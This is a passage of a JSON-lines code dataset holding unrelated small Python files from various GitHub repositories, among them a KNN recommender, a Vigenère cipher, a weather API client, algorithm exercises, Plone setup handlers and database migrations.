scoring method that prefers older archives, and those\n# # where another archive exists that was created around the same time\n# # - oldest: delete the oldest archive\n# # - never: do not delete any archive, but print an error and exit\n# # Note: we never delete archives that serve as reference for other\n# # (incremental) archives.\n#\n# IgnoreChangingFiles=false\n# # If dar detects that files are changing while it is reading them, those files\n# # within the archive may contain bad (incomplete) data. By default, we\n# # consider this a failure, and do not create a backup. Set this option to\n# # 'true' to create the backup archive anyway. 
The logs will contain messages\n# # explaining what happened and what the affected files are.\n# # See also the --retry-on-change option in \"man dar\"; this may be specified as\n# # part of the DarArguments configuration setting (see above) to change dar's\n# # behaviour (only sensible if IgnoreChangingFiles=true).\n#\n# LogfileName=/home/fred/.darbup/logs/stuff.log\n# # Logfile name.\n#\n# LogsBackupCount=60\n# # How many back copies of logs to retain.\n'''\n\ndef write_default_config(filename):\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n with open(filename, 'wb') as f:\n f.write(_DEFAULT_CONFIG)\n sys.stderr.write('Default configuration file written to {}, '\n 'please customize\\n'.format(filename))\n","repo_name":"c4rlo/darbup","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":7260,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27749602345","text":"# -*- coding: utf-8 -*-\nfrom settings import HASH_TAG_MULTIPLIER, TEXT_MULTIPLIER\n\ndef computeSimilarity(tweet1, tweet2):\n return HASH_TAG_MULTIPLIER * computeHashTagSimilarity(tweet1.hash_tags_tfidf, tweet2.hash_tags_tfidf) + \\\n TEXT_MULTIPLIER * computeTextSimilarity(tweet1.tweet_text_tfidf, tweet2.tweet_text_tfidf)\n\ndef computeHashTagSimilarity(hash_tags_tfidf1, hash_tags_tfidf2):\n result = 0\n for key, weight1 in hash_tags_tfidf1.iteritems():\n weight2 = hash_tags_tfidf2.get(key, 0)\n result = result + weight1 * weight2\n return result\n\ndef computeTextSimilarity(tweet_text_tfidf1, tweet_text_tfidf2):\n result = 0\n for key, weight1 in tweet_text_tfidf1.iteritems():\n weight2 = tweet_text_tfidf2.get(key, 0)\n result = result + weight1 * weight2\n return result","repo_name":"zhuwu/twitter-friend-recommendation","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19359949719","text":"import os\nfrom itertools import *\n\nfrom footy.src.matches.match import Match\nfrom footy.src.clubs.club import Club\n\n\nclass ClubGateway:\n def __init__(self, csv_path):\n self.csv_path = csv_path\n\n def get_all(self):\n csv_contents = self.read_csv()\n lines = csv_contents.split('\\n')\n matches = [Match(line) for line in islice(lines, 1, None) if len(line) > 1]\n groups = groupby(sorted(matches, key=lambda m: m.host_name), lambda m: m.host_name)\n clubs = [Club(key, matches) for key, group in groups]\n return clubs\n\n def read_csv(self):\n f = None\n try:\n f = open(self.csv_path)\n return f.read()\n finally:\n if f is not None:\n f.close()\n","repo_name":"bryce-klinker/hello-python","sub_path":"footy/src/clubs/club_gateway.py","file_name":"club_gateway.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33496636867","text":"#!/usr/bin/env python\n\n\n\"\"\"\nProblem Definition :\n\nThis script implements KNN algorithm which provides methods to find k closest documents to the given document.\n\n\"\"\"\n\n__author__ = 'vivek'\n\nfrom tfidf import *\n\n\nclass KNN(object):\n\n def __init__(self, docs):\n self.docs = docs\n\n def find_k_neighbours(self, target, k):\n \"\"\"\n Find K nearest neighbours of given doc\n :param docs: list of docs\n :param target: source doc\n :param k: parameter k\n :return: list of k nearest docs.\n \"\"\"\n distance_list = list()\n\n # for each doc, find the 
similarity and update the distance list.\n docs = self.docs\n if target in docs:\n docs.remove(target)\n\n for i in range(len(docs)):\n doc = docs[i]\n distance_list.append((i, cosine_similarity(doc, target)))\n\n # sort the list and pick top k results.\n sorted_dist_list = sorted(distance_list, key=lambda x: x[1], reverse=True)\n\n k_neighbours = list()\n\n for i in range(k):\n k_neighbours.append(docs[sorted_dist_list[i][0]])\n\n return k_neighbours\n\n\ndef euclidean_distance(doc1, doc2):\n \"\"\"\n The euclidean distance between two docs\n :param doc1: First doc\n :param doc2: Second doc\n :return: the distance between docs.\n \"\"\"\n\n distance = 0\n v1, v2 = doc1.vector, doc2.vector\n features = list(set(v1.keys()).union(v2.keys()))\n\n for feature in features:\n distance += pow((v1[feature] - v2[feature]), 2)\n\n return math.sqrt(distance)\n\n\ndef cosine_similarity(doc1, doc2):\n \"\"\"\n The cosine_similarity between two docs\n :param doc1: First doc\n :param doc2: Second doc\n :return: the cosine_similarity between docs.\n \"\"\"\n\n distance = 0\n v1, v2 = doc1.vector, doc2.vector\n\n # Choose the doc with less features to lessen the calculations.\n if len(v2.keys()) < len(v1.keys()):\n v1, v2 = v2, v1\n\n for feature in v1.keys():\n distance += (v1[feature] * v2[feature])\n\n return distance\n\n","repo_name":"vivekpabani/News-Recommendation-System","sub_path":"source_code/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"37"} +{"seq_id":"69878192747","text":"import heapq\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def mergeKLists(self, lists: 'List[ListNode]') -> 'ListNode':\n queue, res = [], []\n\n for l in lists:\n while l:\n heapq.heappush(queue, l.val)\n l = l.next\n\n while queue:\n res.append(heapq.heappop(queue))\n\n return res","repo_name":"hotheat/LeetCode","sub_path":"023. Merge k Sorted Lists/heapq.py","file_name":"heapq.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"954020144","text":"#Looks like this is O(N) solution. Also it doesn't pass all the test cases in Leetcode. 
Check out more efficient O(log n) solutions\nclass Solution:\n def myPow(self, x, n):\n \"\"\"\n :type x: float\n :type n: int\n :rtype: float\n \"\"\"\n #When n=0, return 1.0\n #When n>0, multiply x by itself n times\n #When n<0, return 1/x^n\n #return float\n if( n > 0 ):\n pow = pow_helper(x, n)\n elif( n < 0 ):\n pow = 1.0 / pow_helper(x, abs(n))\n else:\n pow = 1.0\n return(pow)\n\ndef pow_helper(x, n):\n pow = 1.0\n for i in range(n):\n pow = pow * x\n return(pow)","repo_name":"aparna-narasimhan/python_examples","sub_path":"Misc/power_impl_incomplete.py","file_name":"power_impl_incomplete.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20386031482","text":"import sys\r\nnum = int(sys.stdin.readline())\r\ncount = num\r\n\r\nfor i in range(num) :\r\n str = input()\r\n for j in range(len(str)-1) : \r\n if str[j] != str[j+1] :\r\n if str[j] in str[j+1:] :\r\n count -=1\r\n break\r\n\r\nprint(count)\r\n\r\n","repo_name":"yundevingV/Algorithm_","sub_path":"Python/1316.py","file_name":"1316.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"24207434627","text":"\"\"\"\nCreate privileges table\n\"\"\"\n\nfrom yoyo import step\n\n__depends__ = {'20221108_01_CoxYh-create-the-groups-table'}\n\nsteps = [\n step(\n \"\"\"\n CREATE TABLE privileges(\n privilege_id TEXT PRIMARY KEY,\n privilege_name TEXT NOT NULL\n ) WITHOUT ROWID\n \"\"\",\n \"DROP TABLE IF EXISTS privileges\")\n]\n","repo_name":"fredmanglis/gn-auth","sub_path":"migrations/auth/20221108_02_wxTr9-create-privileges-table.py","file_name":"20221108_02_wxTr9-create-privileges-table.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20514599934","text":"# N-Queen\ndef queen(row):\n global cnt\n if row == N:\n cnt += 1\n return\n\n for col in range(N):\n if cols[col] == 0:\n for i in range(row):\n if row - i == abs(col - diagonal[i]):\n break\n else:\n cols[col] = 1\n diagonal[row] = col\n queen(row+1)\n cols[col] = 0\n \nN = int(input())\ndiagonal = [0] * N\ncols = [0] * N\ncnt = 0\n\nqueen(0)\nprint(cnt)","repo_name":"SystemOutGirlsAlgorithm/algorithm","sub_path":"9월/2022-09-24/baekjoon_9663_뚜망.py","file_name":"baekjoon_9663_뚜망.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"}
+{"seq_id":"15019591673","text":"#!/usr/bin/env python\n# coding=utf-8\n\"\"\"Provides method for using Vigenère's cipher.\"\"\"\n\nimport caesar_cipher\n\ndef cipher(key, text, decipher = 0):\n \"\"\"Ciphers or deciphers 'text' using 'key'.\"\"\"\n r = ''\n ki = 0\n for c in text:\n if c.isalpha():\n nki = (ord(key[ki].lower()) - 97) % 26\n if decipher:\n r += caesar_cipher.shift(nki, c, decipher=1)\n else:\n r += caesar_cipher.shift(nki, c)\n ki = (ki + 1) % len(key)\n else:\n r += c\n return r\n","repo_name":"S8A/datacipher","sub_path":"vigenere_cipher.py","file_name":"vigenere_cipher.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36389102245","text":"#! 
/usr/bin/env python3\n\nimport asyncio\nimport urllib.parse\n\nimport lxml # type: ignore\n\nfrom bs4 import BeautifulSoup # type: ignore\nfrom selenium.common.exceptions import TimeoutException # type: ignore\nfrom selenium.webdriver.chrome.webdriver import WebDriver # type: ignore\nfrom selenium.webdriver.common.by import By # type: ignore\nfrom selenium.webdriver.support.ui import WebDriverWait # type: ignore\nfrom selenium.webdriver.support import expected_conditions # type: ignore\n\nfrom ff14angler.constants.values import (\n ANGLER_BASE_URL,\n ANGLER_PAGE_LOAD_WAIT_DURATION,\n ANGLER_DELAY_BETWEEN_REQUESTS_DURATION\n)\nfrom ff14angler.dataClasses.bait.bait import Bait\nfrom ff14angler.dataClasses.bait.baitProvider import BaitProvider\nfrom ff14angler.dataClasses.comment.commentSection import CommentSection\nfrom ff14angler.exceptions.networkException import NetworkException\nfrom ff14angler.scraper.lodestoneImageScraper import LodestoneImageScraper\nfrom ff14angler.network.delayOnReleaseLock import DelayOnReleaseLock\n\n\nclass BaitScraper:\n\n @staticmethod\n async def update_bait_with_large_icon_url(bait: Bait, driver: WebDriver):\n if bait.bait_angler_lodestone_url:\n if bait.bait_icon_url is None:\n raise ValueError(f'Missing icon url from xivapi: {bait}')\n\n bait.bait_large_icon_url = await LodestoneImageScraper.get_large_icon(\n driver=driver,\n short_icon_url=bait.bait_icon_url,\n lodestone_url=bait.bait_angler_lodestone_url\n )\n\n @staticmethod\n async def ensure_all_bait_mooch_fish_up_to_date():\n for bait_id, bait in BaitProvider.bait_holder.items():\n if bait.bait_angler_is_mooch_fish:\n await bait.update_bait_with_assume_is_mooch_fish(False)\n\n @classmethod\n async def collect_bait_data(cls, driver: WebDriver):\n bait_url_template = urllib.parse.urljoin(ANGLER_BASE_URL, '/bait/')\n lock = DelayOnReleaseLock(ANGLER_DELAY_BETWEEN_REQUESTS_DURATION)\n\n for bait_id, bait in BaitProvider.bait_holder.items():\n angler_url: str = urllib.parse.urljoin(bait_url_template, str(bait_id))\n for attempt in range(3):\n driver.get('about:blank')\n print(f'Scraping page: {angler_url}')\n driver.get(angler_url)\n\n try:\n WebDriverWait(driver, ANGLER_PAGE_LOAD_WAIT_DURATION).until(\n expected_conditions.presence_of_element_located(\n (By.CSS_SELECTOR, 'form.comment_form')\n )\n )\n\n async with lock:\n await asyncio.sleep(2)\n html: str = driver.page_source\n\n await bait.update_bait_with_comment_section(\n await CommentSection.get_comment_section_from_web_driver(driver)\n )\n break\n except (NetworkException, TimeoutException, ValueError,):\n if attempt == 2:\n raise\n\n await bait.update_bait_with_bait_soup(BeautifulSoup(html, lxml.__name__))\n await cls.update_bait_with_large_icon_url(bait, driver)\n","repo_name":"joshua-software-dev/FF14AnglerParser","sub_path":"ff14angler/scraper/baitScraper.py","file_name":"baitScraper.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23956237045","text":"import re\n\nfrom symptom_tagger.TextAnalyse.text_preprocessing import main_text\ngenes_list = []\nsymptoms_list = []\n\nwith open('symptom_tagger/TextAnalyse/genes.txt', 'r') as inputFile1:\n # loop through each line in file\n for line in inputFile1:\n line = line.strip()\n # print(line)\n genes_list.append(line)\n\n\nwith open('symptom_tagger/TextAnalyse/symptoms_v3.txt', 'r') as inputFile:\n # loop through each line in file\n for line in inputFile:\n line = line.strip()\n 
symptoms_list.append(line)\n\n\ndef match_symptoms(search):\n\n \"\"\"Get the perfect symptom matches related to the search phrases\"\"\"\n\n text = \"\"\n\n for item in search:\n sentence = re.sub(r'<\/?[^>]*>', '', item)\n # print(\"1st\")\n # print(sentence)\n pattern = r'<c>(.*?)<\/c>'\n noun_prases = re.findall(pattern, item, flags=0)\n # print(symptoms)\n for s in noun_prases:\n # new_sent = \"\"\n for symptom in symptoms_list:\n if symptom.lower() == s.lower():\n # print token\n sentence = sentence.replace(s, \"\" + s + \"\", 1)\n break\n text += ' '+sentence\n # print(text)\n return text\n\n\ndef symptoms_tagger(x):\n\n search = main_text(x)\n\n tagged_symptom_list = match_symptoms(search)\n return tagged_symptom_list\n","repo_name":"terannadee/Disease-symptoms-Relation-Extraction","sub_path":"symptom_tagger/TextAnalyse/fuzzy.py","file_name":"fuzzy.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"}
+{"seq_id":"26028696367","text":"import pymysql\r\n\r\nclass jdbc_connect:\r\n cursor=\"\";\r\n db=False;\r\n\r\n def __init__(self,host,username,password,database):\r\n try:\r\n jdbc_connect.db = pymysql.connect(host, username,password, database, charset=\"utf8\");\r\n jdbc_connect.cursor = self.db.cursor();\r\n except BaseException:\r\n print(\"Database connection error\")\r\n self.db.close()\r\n\r\n def select(self,sql):\r\n jdbc_connect.cursor.execute(sql);\r\n students=self.cursor.fetchall();\r\n return students;\r\n\r\n def insert(self,sql):\r\n try:\r\n jdbc_connect.cursor.execute(sql);\r\n jdbc_connect.db.commit();\r\n except pymysql.DataError:\r\n jdbc_connect.db.rollback();\r\n print(\"Insert operation failed\")\r\n return \"1\"\r\n else:\r\n return \"0\"\r\n\r\n def update(self,sql):\r\n try:\r\n jdbc_connect.cursor.execute(sql);\r\n jdbc_connect.db.commit();\r\n except pymysql.DataError:\r\n jdbc_connect.db.rollback();\r\n print(\"Update operation failed\")\r\n return \"1\"\r\n else:\r\n return \"0\"\r\n\r\n def delete(self,sql):\r\n try:\r\n jdbc_connect.cursor.execute(sql);\r\n jdbc_connect.db.commit();\r\n except pymysql.DataError:\r\n jdbc_connect.db.rollback();\r\n print(\"Delete operation failed\")\r\n return \"1\"\r\n else:\r\n return \"0\"\r\n\r\n def closedb(self):\r\n try:\r\n self.cursor.close();\r\n self.db.close();\r\n except BaseException:\r\n print(\"db close error\")\r\n","repo_name":"lantings/source","sub_path":"doumingquan/python3/module/jdbc_jaydebeapi/jdbcs.py","file_name":"jdbcs.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"4825839367","text":"from bika.ui import PROFILE_ID\nfrom bika.ui import logger\nfrom bika.ui.interfaces import IBikaUILayer\nfrom plone.api.portal import set_registry_record\nfrom plone.registry.interfaces import IRegistry\nfrom zope.component import getUtility\nfrom bika.lims.api import get_request\nfrom senaite.core.setuphandlers import _run_import_step\n\n\ndef is_installed():\n request = get_request()\n return IBikaUILayer.providedBy(request)\n\n\ndef install(context):\n if context.readDataFile(\"bika.ui.default.txt\") is None:\n return\n logger.info(\"BIKA.UI install handler [BEGIN]\")\n portal = context.getSite()\n _run_import_step(portal, \"skins\", PROFILE_ID)\n _run_import_step(portal, \"browserlayer\", PROFILE_ID)\n add_languages(portal)\n logger.info(\"BIKA.UI install handler [DONE]\")\n\n\ndef post_install(portal_setup):\n pass\n\n\ndef uninstall(context):\n if 
context.readDataFile(\"bika.ui.uninstall.txt\") is None:\n return\n portal = context.getSite()\n reset_settings(portal)\n\n\ndef reset_settings(portal):\n \"\"\"Reset the settings from registry to match with defaults\n \"\"\"\n logger.info(\"BIKA.UI Reset core registry defaults\")\n root = \"/++plone++senaite.core.static\"\n default_settings = {\n \"plone.site_title\": u\"SENAITE LIMS\",\n \"senaite.toolbar_logo\": u\"{}/images/senaite.svg\".format(root),\n \"senaite.toolbar_logo_styles\": {\"height\": \"15px\"},\n }\n\n for key, val in default_settings.items():\n set_registry_record(key, val)\n\n logger.info(\"BIKA.UI Reset core registry defaults [DONE]\")\n\n\ndef add_languages(portal):\n \"\"\"Add en-gb language\n \"\"\"\n registry = getUtility(IRegistry)\n if 'plone.available_languages' in registry:\n languages = registry['plone.available_languages']\n if 'en-gb' not in languages:\n languages.append('en-gb')\n registry['plone.available_languages'] = languages\n","repo_name":"bikalims/bika.ui","sub_path":"src/bika/ui/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"19644435974","text":"from enum import Enum\nfrom src.syntax.expressions import Expression\n\n\nclass ConditionTypes(Enum):\n ISTRUE = 0\n ISFALSE = 1\n GREATER = 2\n LESSER = 3\n GREATEROREQUAL = 4\n LESSEROREQUAL = 5\n EQUAL = 6\n\n\nclass Condition:\n conditionDict = {\n \"less\": ConditionTypes.LESSER,\n \"equal\": ConditionTypes.EQUAL,\n \"greater\": ConditionTypes.GREATER\n }\n\n __conditionMap = {\n ConditionTypes.LESSER: \"<\",\n ConditionTypes.EQUAL: \"==\",\n ConditionTypes.GREATER: \">\"\n }\n\n def __init__(self, tokens, scope=None):\n self.__tokens = tokens\n self.scope = scope\n self.__parse()\n\n def __parse(self):\n # Looks for condition keywords\n for i, token in enumerate(self.__tokens):\n if token == \"is\" and self.__tokens[i + 1] in [\"less\", \"equal\", \"greater\"] and self.__tokens[i + 2] in [\n \"than\", \"to\"]:\n # Parses expressions before and after the condition keywords\n first_tokens = self.__tokens[0:i]\n second_tokens = self.__tokens[i + 3:len(self.__tokens)]\n self.first_expression = Expression(first_tokens, self.scope)\n self.second_expression = Expression(second_tokens, self.scope)\n self.conditionType = self.conditionDict[self.__tokens[i + 1]]\n\n def usesSingleValue(self):\n return self.second_expression is None\n\n def toPython(self):\n if not self.usesSingleValue():\n return f\"({self.first_expression.toPython()}){self.__conditionMap[self.conditionType]}({self.second_expression.toPython()})\"\n","repo_name":"Sherif-Abdou/ezpy","sub_path":"src/syntax/conditions/condition.py","file_name":"condition.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35890397928","text":"\"\"\"\nPre_defined values for axi4 signals in case uart slave\nx= 'R' or 'W'\n\"\"\"\n\n\"\"\"\nthere is doubt in re initializing the ready and valid signals\n\"\"\"\nAxID = 0b0001\nARID = 0\nAxPROT = 0b000\nburst_type = \"FIXED\"\nWID = 0b0001\nBaud_WSTRB = 0x03\nTx_Rx_WSTRB = 0x01","repo_name":"cbkathir/shakti_intern","sub_path":"simple-uart/tests/uart_predefined_signals.py","file_name":"uart_predefined_signals.py","file_ext":"py","file_size_in_byte":256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"7936560741","text":"import sys\nsys.stdin = open('15684.txt', 'r')\n\nimport itertools, collections\nW, M, H = map(int, input().split())\nL = [[0 for _ in range(W)] for _ in range(H)]\n\nfor _ in range(M):\n a, b = map(int, input().split())\n L[a-1][b-1] += 2\n L[a-1][b] += 3\n# for l in L:\n# print(l)\n\n\ndef check(): # r, c\n for c in range(W):\n cc = c # c copy\n r = 0\n while cc < W and r < H:\n while r + 1 < H and not L[r][cc]:\n r += 1\n if L[r][cc] == 2:\n if L[r][cc+1] == 3:\n r += 1\n cc += 1\n continue\n if L[r][cc] == 3:\n if L[r][cc-1] == 2:\n r += 1\n cc += -1\n continue\n r += 1\n if c != cc:\n return False\n return True\n\n\ndef construction(comb):\n cnt = 0\n for c in comb:\n w, h = c[0], c[1]\n if L[h][w]:\n break\n else:\n L[h][w] = 2\n L[h][w + 1] = 3\n cnt += 1\n else:\n if check():\n return len(comb)\n\n for c in comb[:cnt]:\n w, h = c[0], c[1]\n L[h][w] = 0\n L[h][w + 1] = 0\n\n\ndef make_ladder():\n ladder_list = []\n for h in range(H):\n for w in range(W-1):\n if not L[h][w]:\n if not L[h][w+1]:\n ladder_list += [(w, h)]\n\n for k in range(1, 4):\n ladder_comb = collections.deque(itertools.combinations(ladder_list, k))\n while ladder_comb:\n tmp = construction(ladder_comb.popleft()) # 조합 한 쌍씩\n if tmp:\n return tmp\n return -1\n\n\ndef main():\n if check():\n return print(0)\n return print(make_ladder())\n\n\nmain()\n# 271664\t1836","repo_name":"anyl92/ALGORITHM","sub_path":"baek/baek_15684_ladder.py","file_name":"baek_15684_ladder.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"67455327","text":"import requests\r\nimport time\r\nimport logging\r\nlogger = logging.getLogger(__name__)\r\n\r\nclass WeatherService:\r\n def __init__(self, lat, lon, apiKey, dataRefreshTime):\r\n self.lat = lat\r\n self.lon = lon\r\n self.apiKey = apiKey\r\n self.dataRefreshTime = dataRefreshTime\r\n self.weatherId=0\r\n self.weatherString=\"Unknown\"\r\n self.temp=0\r\n self.tempFeel=0\r\n self.pressure=0\r\n self.humidity=0\r\n self.windSpeed=0\r\n self.windDir=0\r\n self.clouds = 0\r\n self.rain1h=0\r\n self.snow1h=0\r\n self.dataTimeLin=0\r\n #fetch initial data\r\n self.fetchData()\r\n \r\n def getData(self):\r\n if time.time() - self.fetchTime >= self.dataRefreshTime:\r\n #its time to fetch new data\r\n self.fetchData()\r\n return { \"weatherId\": self.weatherId,\r\n \"temp\": self.temp, \"tempFeel\": self.tempFeel, \"press\": self.pressure,\r\n \"humid\": self.humidity, \"ws\": self.windSpeed, \"wd\": self.windDir,\r\n \"clouds\": self.clouds, \"rain\": self.rain1h, \"snow\": self.snow1h,\r\n \"dt\": self.dataTimeLin }\r\n\r\n \r\n def fetchData(self):\r\n self.fetchTime = time.time()\r\n try:\r\n response = requests.get(\r\n \"https://api.openweathermap.org/data/2.5/weather?lat={}&lon={}&appid={}&units=metric\"\r\n .format(self.lat,self.lon,self.apiKey))\r\n except ConnectionError as e:\r\n logger.error(\"Error while reading weather data (Connection Error): {}\".format(e))\r\n else:\r\n if response.status_code != 200:\r\n logger.error(\"Error while reading weather data, response status: {}\".format(response.status_code))\r\n responseJson = response.json()\r\n if not responseJson:\r\n logger.error(\"Error while reading weather data, no JSON in response\")\r\n return { \"status\": -1}\r\n #basic weather info\r\n if 'weather' in responseJson: \r\n self.weatherId=responseJson['weather'][len(responseJson['weather'])-1]['id'] \r\n 
self.weatherString=responseJson['weather'][len(responseJson['weather'])-1]['main']\r\n #atmospheric info\r\n if 'main' in responseJson: \r\n self.temp=responseJson['main']['temp']\r\n self.tempFeel=responseJson['main']['feels_like']\r\n self.pressure=responseJson['main']['pressure']\r\n self.humidity=responseJson['main']['humidity']\r\n #wind info\r\n if 'wind' in responseJson:\r\n self.windSpeed=responseJson['wind']['speed']\r\n self.windDir=responseJson['wind']['deg']\r\n #clouds info\r\n if 'clouds' in responseJson:\r\n self.clouds=responseJson['clouds']['all']\r\n #rain\r\n if 'rain' in responseJson:\r\n self.rain1h=responseJson['rain']['1h']\r\n #snow\r\n if 'snow' in responseJson:\r\n self.snow1h=responseJson['snow']['1h']\r\n if 'dt' in responseJson:\r\n self.dataTimeLin=responseJson['dt']\r\n logger.debug(\"WeatherService: Fetched new data\")\r\n \r\n","repo_name":"martinbusa/LoxoneAdvancedController","sub_path":"home_libs/weatherservice.py","file_name":"weatherservice.py","file_ext":"py","file_size_in_byte":3285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"8891045374","text":"from utils import load_data\nfrom MLP import mlp\nimport torch\nimport torchvision\nfrom torch.nn import Module\nimport cifar10 as dataset\nimport torch.nn.functional as F\nimport numpy as np\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom logentropy import LogEntropyLoss\n\n\n\nepochs = 2000\n\nlr = 0.1\nlabel = \"l1loss_4classeswithMLP\"\n\n\n\ndef train(train_loader, model, optimizer, train_criterion, use_cuda, epoch):\n sum_loss = 0.0\n for data in train_loader:\n img, label = data\n if use_cuda:\n img = Variable(img).cuda()\n label = Variable(label).cuda()\n else:\n img = Variable(img)\n label = Variable(label)\n out = model(img)\n loss = train_criterion(out, label)\n print_loss = loss.data.item()\n sum_loss += print_loss\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print('Epoch', epoch, 'Train Loss:', sum_loss)\n return sum_loss\n\ndef watch(watch_loader, model, watch_criterion, use_cuda, epoch):\n sum_loss = 0.0\n with torch.no_grad():\n for data in watch_loader:\n val_inputs, label = data\n if use_cuda:\n val_inputs = Variable(val_inputs).cuda()\n label = Variable(label).cuda()\n val_outputs = model(val_inputs)\n loss = watch_criterion(val_outputs, label)\n print_loss = loss.data.item()\n sum_loss += print_loss\n print('Epoch:', epoch, 'True Loss:', sum_loss)\n return sum_loss\n\ndef valid(valid_loader, model, use_cuda, epoch):\n total_correct = 0.0\n total_num = 0.0\n with torch.no_grad():\n for data in valid_loader:\n val_inputs, label = data\n if use_cuda:\n val_inputs = Variable(val_inputs).cuda()\n label = Variable(label).cuda()\n val_outputs = model(val_inputs)\n pred = val_outputs.argmax(dim=1)\n total_correct += torch.eq(pred,label).float().sum().item() # compare elementwise for equality, convert the scalar tensor to float, sum, then take the value\n total_num += label.size(0)\n acc = total_correct/total_num\n print('Epoch:', epoch, 'Val Acc:', acc)\n return acc \n\ndef plot_curve(epochs, train_losses, true_losses, valid_accs, label):\n epoch_num = epochs\n x1 = range(0, epoch_num)\n x2 = range(0, epoch_num)\n x3 = range(0, epoch_num)\n plt.subplot(3, 1, 1)\n plt.plot(x1, valid_accs, 'o-')\n plt.ylabel('Val Acc')\n plt.subplot(3, 1, 2)\n plt.plot(x2, train_losses, '.-')\n plt.ylabel('Train Loss')\n plt.subplot(3, 1, 3)\n plt.plot(x3, true_losses, '.-')\n plt.xlabel('epochs')\n plt.ylabel('True Loss')\n 
plt.savefig('./logs/'+label +\".png\")\n\ndef log(tag, train_loss, true_loss, val_acc, e_losses, c_losses):\n data = {'train loss':train_loss, \"true loss\":true_loss, \"val acc\":val_acc, 'loss term 1':e_losses, 'loss term 2':c_losses}\n df = pd.DataFrame(data)\n df.to_csv('./logs/'+label+tag+'.csv')\n\n\ndef main():\n use_cuda = torch.cuda.is_available()\n print(\"cuda:\",use_cuda)\n model = mlp()\n if use_cuda:\n model = model.cuda()\n train_loader, watch_loader, valid_loader = load_data()\n train_criterion = torch.nn.L1Loss()\n #ce_loss = LogEntropyLoss()\n watch_criterion = torch.nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=lr, momentum=0.9, weight_decay=1e-4)\n # optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=[100], gamma=0.1)\n train_losses = []\n true_losses = []\n valid_accs = []\n for epoch in range(epochs):\n train_loss = train(train_loader, model, optimizer, train_criterion, use_cuda, epoch)\n train_losses.append(train_loss)\n true_loss = watch(watch_loader, model, watch_criterion, use_cuda, epoch)\n true_losses.append(true_loss)\n val_acc = valid(valid_loader, model, use_cuda, epoch)\n valid_accs.append(val_acc)\n # if epoch % 200 == 1:\n # log(str(epoch), train_losses, true_losses, valid_accs, entropy_losses, cons_losses)\n scheduler.step()\n #log(str(epoch), train_losses, true_losses, valid_accs, entropy_losses, cons_losses)\n plot_curve(epochs, train_losses, true_losses, valid_accs, label)\n\n\nif __name__ == '__main__':\n main()\n \n \n\n","repo_name":"tangzyer/SubsetLosses","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70994874667","text":"\"\"\"Drop checksum on ImageStorage\n\nRevision ID: c91c564aad34\nRevises: 152bb29a1bb3\nCreate Date: 2018-02-21 12:17:52.405644\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'c91c564aad34'\ndown_revision = '152bb29a1bb3'\n\nfrom alembic import op as original_op\nfrom data.migrations.progress import ProgressWrapper\nimport sqlalchemy as sa\n\n\ndef upgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.drop_column('imagestorage', 'checksum')\n\n\ndef downgrade(tables, tester, progress_reporter):\n op = ProgressWrapper(original_op, progress_reporter)\n op.add_column('imagestorage', sa.Column('checksum', sa.String(length=255), 